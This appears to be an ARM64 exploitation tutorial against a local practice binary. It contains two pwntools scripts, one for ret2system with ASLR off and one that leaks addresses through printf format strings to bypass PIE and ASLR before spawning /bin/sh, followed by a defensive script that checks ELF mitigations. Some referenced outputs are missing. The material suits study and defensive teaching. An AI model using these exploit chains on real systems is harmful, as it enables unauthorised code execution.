Using pattern create 200, analysing the crash it produces and checking with pattern search $x30, we can see that the offset to the saved return address is 108 (0x6c).
Looking at the disassembled main function we can see that we want to jump straight to the instruction that calls printf, whose offset from the binary's load base is 0x860:
Find system and the /bin/sh string
As ASLR is disabled, the addresses will always be the same:
Find gadgets
We need x0 to hold the address of the /bin/sh string and then call system.
Using rooper an interesting gadget was found:
This gadget loads x0 from $sp + 0x18, then loads x29 and x30 from sp (post-incrementing sp by 0x20) and jumps to x30. So with this gadget we can control the first argument and then jump to system.
from pwn import *
from time import sleep

p = process('./rop')  # For local binary
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
libc.address = 0x0000fffff7df0000
binsh = next(libc.search(b"/bin/sh"))  # Verify with find /bin/sh
system = libc.sym["system"]

def expl_bof(payload):
    p.recv()
    p.sendline(payload)

# Ret2system: the gadget picks up x0 from sp+0x18 and returns into x30
stack_offset = 108
ldr_x0_ret = p64(libc.address + 0x6bdf0)  # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x18 - 0x10)  # padding between x30 and the slot read into x0
x0 = p64(binsh)
payload = b"A" * stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
p.sendline(payload)
p.interactive()
p.close()
Ret2lib - Bypassing NX, ASLR & PIE with printf leaks from the stack
This gadget loads x0 from $sp + 0x78, then loads x29 and x30 from sp (post-incrementing sp by 0xc0) and jumps to x30. So with this gadget we can control the first argument and then jump to system.
from pwn import *
from time import sleep

p = process('./rop')  # For local binary
libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")

def leak_printf(payload, is_main_addr=False):
    p.sendlineafter(b">\n", payload)
    response = p.recvline().strip()[2:]  # Remove new line and "0x" prefix
    if is_main_addr:
        response = response[:-4] + b"0000"  # page-align the leaked text address
    return int(response, 16)

def expl_bof(payload):
    p.recv()
    p.sendline(payload)

# Get main address
main_address = leak_printf(b"%21$p", True)
print(f"Bin address: {hex(main_address)}")

# Ret2main
stack_offset = 108
main_call_printf_offset = 0x860  # Offset inside main of the call to the leaking printf
print("Going back to " + str(hex(main_address + main_call_printf_offset)))
ret2main = b"A" * stack_offset + p64(main_address + main_call_printf_offset)
expl_bof(ret2main)

# libc
libc_base_address = leak_printf(b"%25$p") - 0x26dc4
libc.address = libc_base_address
print(f"Libc address: {hex(libc_base_address)}")
binsh = next(libc.search(b"/bin/sh"))
system = libc.sym["system"]

# ret2system
ldr_x0_ret = p64(libc.address + 0x49c40)  # ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;
x29 = b"AAAAAAAA"
x30 = p64(system)
fill = b"A" * (0x78 - 0x10)  # padding between x30 and the slot read into x0
x0 = p64(binsh)
payload = b"A" * stack_offset + ldr_x0_ret + x29 + x30 + fill + x0
p.sendline(payload)
p.interactive()
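Both chains above only work because of a property of the target: in the first case ASLR is off so libc sits at a fixed address, and in the second case the binary leaks stack contents through printf, which is what makes PIE and ASLR recoverable. From the defensive side the useful check is whether a build actually ships with those mitigations. The following script is an added example, not code from the original page or from the rop binary it discusses: it parses an ELF64 header with the standard library only and reports whether the image is PIE (e_type == ET_DYN) and whether it requests a non-executable stack (PT_GNU_STACK without PF_X), plus the host's ASLR level from /proc. The build_sample_elf helper constructs a tiny synthetic ELF image (header plus one program header) purely so the checker can run offline; it is not a real binary.

```python
import struct
from typing import Optional

# Constants from the ELF64 specification.
ELF_MAGIC = b"\x7fELF"
ELFCLASS64 = 2
ELFDATA2LSB = 1
ET_EXEC, ET_DYN = 2, 3
EM_AARCH64 = 183
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def elf_mitigations(data: bytes) -> dict:
    """Report PIE and NX status of an ELF64 image held in memory.

    PIE: e_type == ET_DYN, so the loader can place the text at a random base.
    NX:  a PT_GNU_STACK program header without PF_X (non-executable stack).
    A missing PT_GNU_STACK header is reported as no NX, since Linux then falls
    back to an executable stack on most architectures.
    """
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != ELFCLASS64:
        raise ValueError("only ELF64 is handled here")
    end = "<" if data[5] == ELFDATA2LSB else ">"
    e_type, e_machine = struct.unpack_from(end + "HH", data, 16)
    (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)

    nx = False
    gnu_stack_seen = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from(end + "II", data, off)
        if p_type == PT_GNU_STACK:
            gnu_stack_seen = True
            nx = not (p_flags & PF_X)
    return {
        "aarch64": e_machine == EM_AARCH64,
        "pie": e_type == ET_DYN,
        "nx": nx,
        "gnu_stack_header": gnu_stack_seen,
    }


def system_aslr_level(path: str = "/proc/sys/kernel/randomize_va_space") -> Optional[int]:
    """Linux ASLR level (0 off, 1 partial, 2 full), or None when the file is unavailable."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


def build_sample_elf(pie: bool, exec_stack: bool) -> bytes:
    """Constructed minimal ELF64 image (header + one PT_GNU_STACK phdr) for offline testing."""
    ehdr = bytearray(64)
    ehdr[:4] = ELF_MAGIC
    ehdr[4] = ELFCLASS64
    ehdr[5] = ELFDATA2LSB
    ehdr[6] = 1  # EV_CURRENT
    struct.pack_into("<HHI", ehdr, 16, ET_DYN if pie else ET_EXEC, EM_AARCH64, 1)
    struct.pack_into("<Q", ehdr, 32, 64)  # program headers follow the ELF header
    struct.pack_into("<HHH", ehdr, 52, 64, 56, 1)  # e_ehsize, e_phentsize, e_phnum
    flags = PF_R | PF_W | (PF_X if exec_stack else 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 16)
    return bytes(ehdr) + phdr


def summarize(data: bytes) -> str:
    """Human-readable verdict, highlighting the two properties the chains above depend on."""
    m = elf_mitigations(data)
    return "\n".join([
        f"PIE: {'yes' if m['pie'] else 'NO (fixed load address)'}",
        f"NX:  {'yes' if m['nx'] else 'NO (executable stack)'}",
    ])


if __name__ == "__main__":
    import sys
    # With a path argument the real binary is checked; otherwise the constructed sample is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf(pie=False, exec_stack=False)
    print(summarize(blob))
    print("ASLR level:", system_aslr_level())
```

Run it as `python3 check_mitigations.py ./rop` (the filename is an assumption) to see whether a build is PIE and NX; an ASLR level of 0 on the host is the condition the first chain relies on, and a non-PIE result means the printf leak in the second chain would not even be needed to locate main.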